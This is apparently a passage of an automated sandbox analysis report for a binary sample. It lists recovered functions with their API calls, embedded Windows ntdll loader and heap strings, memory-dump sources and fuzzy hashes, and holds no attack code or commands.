                                                              Function 00CFA6A2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00CFA6D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                              • Instruction ID: d5a7c223cdc9289cc6949d16027f7b462c8749b0a7bac1e4603e65904b28d7b1
                                                              • Opcode Fuzzy Hash: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
                                                              • Instruction Fuzzy Hash: 48E08671644244BBD720DB58CC84ED37F66DF55240F19C159BA4EAB751C930D901C7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00CFA6D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction ID: cb2d79f9527e1d92ce071704f3a9425baf19e5e727b88bf3784fe5ad048233a0
                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                              • Instruction Fuzzy Hash: B9D012716002187BD620DB98CC85FD777ACDF48750F118065BA1C5B241C531BA0086E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5a46c9d038f7bae6bb0e4cb440c6694b35962461c4882f32078c457bdc23ed93
                                                              • Instruction ID: 791e242b2d8a26b1bdefd92cfa5e5927cd533114fa27ab0d4880fa283195f9a4
                                                              • Opcode Fuzzy Hash: 5a46c9d038f7bae6bb0e4cb440c6694b35962461c4882f32078c457bdc23ed93
                                                              • Instruction Fuzzy Hash: 9CB09B719055D5C5DB11E7644608717B91077D0701F15C075D2030651F4738C1D1E277
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 01802349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 43e2b45f384bdbf5de74d172e514dbc133924871abbb87573a497f0c7b62cdee
                                                              • Instruction ID: ab2adad0e83b9a25df91a57a8beba6ee7856c7d7dc482e481e160663fb2a1ce0
                                                              • Opcode Fuzzy Hash: 43e2b45f384bdbf5de74d172e514dbc133924871abbb87573a497f0c7b62cdee
                                                              • Instruction Fuzzy Hash: 7B92C17160474AAFE762CF18CC88B6BB7E9BB84714F04481DFA94D7291D7B0EA44CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017768B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-3089669407
                                                              • Opcode ID: dbfb12b626c3a0ab94a11ea062a8a1f33c82b9e25b30b2a40ac6ca49f53210a9
                                                              • Instruction ID: 12f86d9547fe262e988bede715dd33c9040b0cfb97de78e8b6102525865861b6
                                                              • Opcode Fuzzy Hash: dbfb12b626c3a0ab94a11ea062a8a1f33c82b9e25b30b2a40ac6ca49f53210a9
                                                              • Instruction Fuzzy Hash: 4A8144B2D012097FDB11EBE8DDD8EEEB7BDEB04654B550426BA01F7114E671EE048BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01825910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0182635D
                                                              • @, xrefs: 0182647A
                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01825FE1
                                                              • @, xrefs: 018263A0
                                                              • PreferredUILanguagesPending, xrefs: 018261D2
                                                              • @, xrefs: 018261B0
                                                              • @, xrefs: 01826277
                                                              • Control Panel\Desktop, xrefs: 0182615E
                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01825A84
                                                              • @, xrefs: 01826027
                                                              • LanguageConfiguration, xrefs: 01826420
                                                              • LanguageConfigurationPending, xrefs: 01826221
                                                              • InstallLanguageFallback, xrefs: 01826050
                                                              • PreferredUILanguages, xrefs: 018263D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                              • API String ID: 0-1325123933
                                                              • Opcode ID: 8606cd583c5438e6cfc0879d571965f7dfe9c785a14eb10f159f9000707c15f0
                                                              • Instruction ID: e931a23183476cc63fe6b1cfcfcc488d890776dad240243ce4e1bc7b01b33f66
                                                              • Opcode Fuzzy Hash: 8606cd583c5438e6cfc0879d571965f7dfe9c785a14eb10f159f9000707c15f0
                                                              • Instruction Fuzzy Hash: E77259715083519FD326DF28C884BABBBE9BF88704F54492DFA85D7250E730DA85CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Critical section address, xrefs: 017F5425, 017F54BC, 017F5534
                                                              • undeleted critical section in freed memory, xrefs: 017F542B
                                                              • Thread identifier, xrefs: 017F553A
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017F54E2
                                                              • double initialized or corrupted critical section, xrefs: 017F5508
                                                              • corrupted critical section, xrefs: 017F54C2
                                                              • Critical section address., xrefs: 017F5502
                                                              • Critical section debug info address, xrefs: 017F541F, 017F552E
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017F54CE
                                                              • 8, xrefs: 017F52E3
                                                              • Invalid debug info address of this critical section, xrefs: 017F54B6
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 017F5543
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017F540A, 017F5496, 017F5519
                                                              • Address of the debug info found in the active list., xrefs: 017F54AE, 017F54FA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 1a01de87fa6b1271d7b518728f4ecdd38e639a9d1bc8de578acdd64ee48c98b9
                                                              • Instruction ID: 94f04af0e0b645749a24edef15cc746394e67b13d0723d980a70bb3523ed2213
                                                              • Opcode Fuzzy Hash: 1a01de87fa6b1271d7b518728f4ecdd38e639a9d1bc8de578acdd64ee48c98b9
                                                              • Instruction Fuzzy Hash: E4816AB1A40348EFDB20CF9AC859BAEFBB9FB08714F24415DEA04B7641D375A941CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017F22E4
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 017F261F
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017F2624
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017F2498
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017F2602
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017F24C0
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017F25EB
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017F2506
                                                              • @, xrefs: 017F259B
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017F2412
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017F2409
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: e7d96e50d01dfd26eb5c7b969e54091e52064f899733e9e8ecea98cc1d5b75ef
                                                              • Instruction ID: 255652b0e328c3935b3d01fbeb2bb1719a571e7308cff63837bcb7c67eca0af8
                                                              • Opcode Fuzzy Hash: e7d96e50d01dfd26eb5c7b969e54091e52064f899733e9e8ecea98cc1d5b75ef
                                                              • Instruction Fuzzy Hash: 02026DF1D052299BDB21DB54CC84BEAF7B8AF54704F0041DAA709A7252EB70AF84CF59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017B0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                              • API String ID: 0-360209818
                                                              • Opcode ID: 606e1d36d3046da4987ba73f2d1fb09a4aa6251cca6d560f1eacf2ff9832079a
                                                              • Instruction ID: 8632a051226861346f3e6e1c0dfadbaae7f7f65c4028b672538d71d664838dfa
                                                              • Opcode Fuzzy Hash: 606e1d36d3046da4987ba73f2d1fb09a4aa6251cca6d560f1eacf2ff9832079a
                                                              • Instruction Fuzzy Hash: CB628FB5A00229CFDB24CF18C8917AAF7B6AF95320F9581DAD649AB340D7325AD1CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01828B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 4c8b0588dcbc1f459ea09108c692cc55722749f9e0bc5e0e13f0f1db147424b7
                                                              • Instruction ID: 90da4532801d47443872dc5279644c49ebfd7a3e081ba9b45eb410a6cda84bb5
                                                              • Opcode Fuzzy Hash: 4c8b0588dcbc1f459ea09108c692cc55722749f9e0bc5e0e13f0f1db147424b7
                                                              • Instruction Fuzzy Hash: BF51E1B11083259BCB2ADF188848BABBBE8EF95740F54092DED55C3241E770D688CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 018312ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                              • API String ID: 0-3591852110
                                                              • Opcode ID: fc2e2d402e2f388ca4fec267c145d4330474e9c15b50413955e218899a1552ee
                                                              • Instruction ID: 258631b5038fd7604ad51a75b053558989a57cec36396cb2d1d8ac4b98c4d6eb
                                                              • Opcode Fuzzy Hash: fc2e2d402e2f388ca4fec267c145d4330474e9c15b50413955e218899a1552ee
                                                              • Instruction Fuzzy Hash: CB12CE70600646DFDB268F29C499BB6BBF1FF49B04F1C8459E496CB641E734EA81CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0179AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-3197712848
                                                              • Opcode ID: 8b6740bd8d2fabaafb8cfabbdeaa867559145e557c8355ca707cb4ebfb9fccfa
                                                              • Instruction ID: 37e5ffdf68656a8b59a70b7f6a7b6d12cfb550b980e1859c0e01f83df168253f
                                                              • Opcode Fuzzy Hash: 8b6740bd8d2fabaafb8cfabbdeaa867559145e557c8355ca707cb4ebfb9fccfa
                                                              • Instruction Fuzzy Hash: 2E1203716093428FDB25DF28D488BAAFBE5FF84714F04055DF9858B291E734DA48CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0177D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                              • API String ID: 0-3532704233
                                                              • Opcode ID: 72d3bb1197f9bae628ac93a12b002ed6216ac846b781f2f5c82ce7f463e4883c
                                                              • Instruction ID: 983b06fdb31ce72ca9ada019f2e91b2d1d47a4bf2b0661c08b789d3bfd4a68d2
                                                              • Opcode Fuzzy Hash: 72d3bb1197f9bae628ac93a12b002ed6216ac846b781f2f5c82ce7f463e4883c
                                                              • Instruction Fuzzy Hash: BBB19D725083569FDB22DF68C480A6BFBE8BF88754F05492EF989D7240E770D944CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01830CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                              • API String ID: 0-1357697941
                                                              • Opcode ID: e0024ad7979280ead5b679ee7b3957deef7f73c8c428b00132185061be50b74c
                                                              • Instruction ID: cdba26736fc05bff3edee2ac3c0ee89c2d5550b541fc4c0aeea817ede0583d9f
                                                              • Opcode Fuzzy Hash: e0024ad7979280ead5b679ee7b3957deef7f73c8c428b00132185061be50b74c
                                                              • Instruction Fuzzy Hash: 81F11371A0068AEFDB25CF68C454BAAFBF5FF49704F0C8059E585DB282C774AA45CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01830274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 1a0a574d4b3b03c0ac18a6db4f511a085da455ad4d74f600132642ebeabbccdc
                                                              • Instruction ID: 4bb9792a6d26f52fbe47997a7d7274587cacff1102dc4d614aecb3903bc66d38
                                                              • Opcode Fuzzy Hash: 1a0a574d4b3b03c0ac18a6db4f511a085da455ad4d74f600132642ebeabbccdc
                                                              • Instruction Fuzzy Hash: EED1CC3160468ADFDB22DF68C854AAAFBF1FF89714F188059F445DB252D734DA81CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 018089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01808A3D
                                                              • VerifierDlls, xrefs: 01808CBD
                                                              • HandleTraces, xrefs: 01808C8F
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01808B8F
                                                              • VerifierDebug, xrefs: 01808CA5
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01808A67
                                                              • VerifierFlags, xrefs: 01808C50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: bc6e180c746e2b303176071f34eb35ee0b53f72df300bf37e6529ec9338d9dd4
                                                              • Instruction ID: eaea43e55d71affc5975674aabb99174e83cb1d7f0903712104cda87fdd6aa49
                                                              • Opcode Fuzzy Hash: bc6e180c746e2b303176071f34eb35ee0b53f72df300bf37e6529ec9338d9dd4
                                                              • Instruction Fuzzy Hash: 87914771E0171AAFE763EF28CC94B1AB7A4AB56714F050518FA45EB281C730DF80CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0178EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: 5a31edfc13abbc3d91a86d8496644b3a0d6e1258a019affeda4545a785afb802
                                                              • Instruction ID: 008e4d8965206b2d693843b5d72cc54eab3784f898a1a9018674c30b1f887000
                                                              • Opcode Fuzzy Hash: 5a31edfc13abbc3d91a86d8496644b3a0d6e1258a019affeda4545a785afb802
                                                              • Instruction Fuzzy Hash: DCA23974E4562A8FDB64DF19C8887A9FBF5AF49304F1442E9D90EA7290DB309E85CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0177F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              • Opcode ID: 35eba07ac0730f5cf915313b0abda11f1df51cd3c9d2ebb9a90e32ee0e6e0fd3
                                                              • Instruction ID: 1026daab376abf476407399dc418027dd7b1a19f469784702f4e7245d116f246
                                                              • Opcode Fuzzy Hash: 35eba07ac0730f5cf915313b0abda11f1df51cd3c9d2ebb9a90e32ee0e6e0fd3
                                                              • Instruction Fuzzy Hash: BE42F071208786CFDB15DF28C984B6AFBE5FF88304F1849ADE4A58B252DB30D945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0178ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                              • API String ID: 0-4098886588
                                                              • Opcode ID: b8e7d621acfebecf3d0b429be0f893513e307b041e8b90f609005be07d852908
                                                              • Instruction ID: 97909e333a9baafbd19f48fef5bdbe402f5b197124732a85ee763c2b623cb75b
                                                              • Opcode Fuzzy Hash: b8e7d621acfebecf3d0b429be0f893513e307b041e8b90f609005be07d852908
                                                              • Instruction Fuzzy Hash: A7329071D842698BDB22DF18C898BEEFBF5BF45340F1441EAE849AB251D7719E818F40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0179B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              • Opcode ID: fb5016f23a2c87e943f07f8a5a1b587ebb8574b0022110c2b7e12016b0a6ab84
                                                              • Instruction ID: 840f455f4c42b8795f8cb7e2ba49444ef9325d8053f1e54ddfeb6d067e76368c
                                                              • Opcode Fuzzy Hash: fb5016f23a2c87e943f07f8a5a1b587ebb8574b0022110c2b7e12016b0a6ab84
